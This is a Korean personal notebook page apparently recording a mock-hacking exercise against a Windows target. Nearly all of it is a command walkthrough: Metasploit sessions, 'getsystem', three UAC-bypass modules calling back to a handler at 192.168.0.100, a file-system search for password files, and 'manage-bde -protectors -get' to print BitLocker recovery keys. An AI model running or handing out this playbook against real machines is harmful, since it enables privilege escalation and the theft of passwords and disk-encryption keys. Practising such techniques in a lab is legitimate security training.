로그인

모의 해킹 # 사진은 정보가 많아서 다시 삭제 함 못올림

작성: 2026.07.17 10:22 최근 수정: 2026.07.17 10:53
1. 대상의 피시 하드디스크가 몇개 인지 
2. 비트 락커 드라이버 볼륨 락 걸려 있는것 찾기
3. 비트 락커 암호 위치 뚫기 
4. 패스워드 txt 파일 획득 하기 

 













┗ run post/windows/gather/win_privs
┗ shell
┗ wmic diskdrive get model, size


















명령어를 치면 이런식으로 위화면으로 된다   

그다음으로

┗ manage-bde -status












명령어를치면 이런식으로 글자가 깨지면서 무언가 나를 이끌리게 궁금하게 한다 .

글자 깨짐 해결하기 (한글을 영어로 강제 변경)
현재 cmd 창에서 아래 명령어를 입력해 인코딩을 영문(437)으로 변경합니다.

┗ chcp 437

#방법 A
┗ wmic logicaldisk get deviceid, volumename, description
#방법 B (혹시 에러가 난다면)
┗ powershell -Command "Get-Volume"















명령어를치면 이런식으로짠 하고 나타난다 이게 무엇일까 

#문제 해석 결과

C: (볼륨 이름 없음 / 일반 시스템 드라이브)

E: DATA1

F: (볼륨 이름 없음)

G: DATA3

여기서 볼륨 이름이 없고 비트락커(BitLocker) 가 걸려 있을 확률이 가장 높은 드라이브는 F 드라이브입니다. 
(보통 암호화된 상태에서는 볼륨명이 감춰지거나 빈칸으로 보인다.)

2번 정답: 비트락커 드라이버 볼륨 이름은 F: (또는 볼륨명 없음)
──────────────────────
#msfconsole 다시 실행하기
현재 열려있는 터미널 화면(kali@mail) 
상태에서 아래 명령어를 입력해 메타스플로잇으로 다시 들어간다.
┗ msfconsole -q
( 성공하면 msf6 > 프롬프트가 뜬다. )

#백그라운드 세션 복구 및 권한 상승
Metasploit 콘솔 내에서 순서대로 입력 한다.
┗ sessions -i 1
(만약 세션이 끊겼다고 나오면 run을 다시 해서 대상을 감염시킨 후 시도해야 한다.)

# Meterpreter(meterpreter >) 상태로 들어왔다면, 시스템 권한(Administrator/SYSTEM)을 
아주 빠르고 완벽하게 강제 탈취하는 치트키 명령어를 실행한다.
┗  getsystem -t 1
──────────────────────

꼭 meterpreter > 프롬프트 상태에서 아래 명령어를 입력해 세션을 백그라운드로 보내기 

┗ bg
(세션이 백그라운드로 가면서 다시 msf exploit(multi/handler) > 상태가 된다.)
┗ use exploit/windows/local/bypassuac_fodhelper
┗ set SESSION 1
┗ set LHOST 192.168.0.100
┗ set LPORT 4445
┗ run
참고: 만약 연결이 성공하면 자동으로 **Meterpreter session 2 opened**가 뜨면서 관리자 권한이 적용된 새로운 세션으로 들

──────────────────────
다른 UAC 우회 모듈로 뚫기

┗ use exploit/windows/local/bypassuac_eventvwr
┗ set SESSION 1
┗ set LHOST 192.168.0.100
┗ set LPORT 4445
┗ run
만약 이 모듈도 패치 때문에 막힌다면, 다음 우회 모듈을 바로 실행한다.

┗ use exploit/windows/local/bypassuac_silentcleanup
┗ set SESSION 1
┗ set LHOST 192.168.0.100
┗ set LPORT 4445
┗ run


SYSTEM 권한 획득 및 쉘 진입 
┗ getsystem
(성공 메시지가 뜨면 바로 아래 명령어를 쳐서 윈도우 또는 리눅스 켜있는 터미널로 들어간다 
┗ shell


──────────────────────
한글 깨짐 방지 및 4번 패스워드 파일 색출 
┗ chcp 437
┗ dir C:\ /s /b | findstr /i "password.txt"
─────────────────────
BitLocker 복구 키  bit.txt 이라고 무언가가 나올것이다 사진은 안올리겠다 . C:\Windows\system32> 
일단 그럼 C 드라이브에 무언가 있다는 것이다 
─────────────────────
┗ for /f "delims=" %i in ('dir C:\bit.txt /s /b') do type "%i"
위 명령어를 실행하시면 화면에 패스워드가 바로 출력 된다 
─────────────────────
┗  type C:\Users\Manager\Downloads\bit.tx

─────────────────────

그럼 이렇게 알수없는 구문이나오는데  

비트락커 상태 및 복구 키 정보 출력하기

┗ manage-bde.exe -status
(이 명령어는 현재 PC에 연결된 드라이브들의 BitLocker 암호화 상태를 보여준다.)

그리고 가장 중요한 복구 키(패스워드)를 직접 화면에 출력하는 명령어는 아래와 같습니다. 대상 드라이브(보통 윈도우가 설치된 C드라이브)의 보호기 정보를 전부 뽑아낸다 .
┗ manage-bde.exe -protectors -get C:
─────────────────────
Volume E (DATA1): 암호화되지 않음 (Fully Decrypted)

Volume G (DATA3): 암호화되지 않음 (Fully Decrypted)

Volume C (OS): 암호화되지 않음 (Fully Decrypted)

Volume F (Label Unknown): 🔒 Locked (잠겨 있음) / AES 128로 암호화됨 / 키 보호기로 Password와 Numerical Password (복구 키)가 등록되어 있음

즉, F 드라이브가 우리가 복구 키를 찾아서 해제해야 하는 핵심 이지만 이런식으로 보호 및 정보가 엄청 쏟아져 나올것이다 

─────────────────────
┗  cscript C:\Windows\System32\manage-bde.wsf -protectors -get F:
만약 위 명령어가 인자 부족 등의 오류를 낸다면 표준 실행 파일 사용하기

┗  manage-bde.exe -protectors -get F:
이 명령어를 실행하면 화면에 "Numerical Password:" 
항목과 함께 XXXXXX-XXXXXX-XXXXXX... 형태의 48자리 복구 키 숫자가 출력된다 
─────────────────────

위 내용을 하면 다 찾은것이다 
하드 몇개 인지 
볼륨 머가 잠겨 있는지 
잠긴 F 드라이브의 비트락커 정보
최종 추적 및 발견한 암호 파일 정보


노트 이미지
노트 이미지
노트 이미지
노트 이미지
이 노트는 로그인하지 않아도 열람할 수 있습니다. 작성·수정·삭제는 관리자 로그인 후 가능합니다.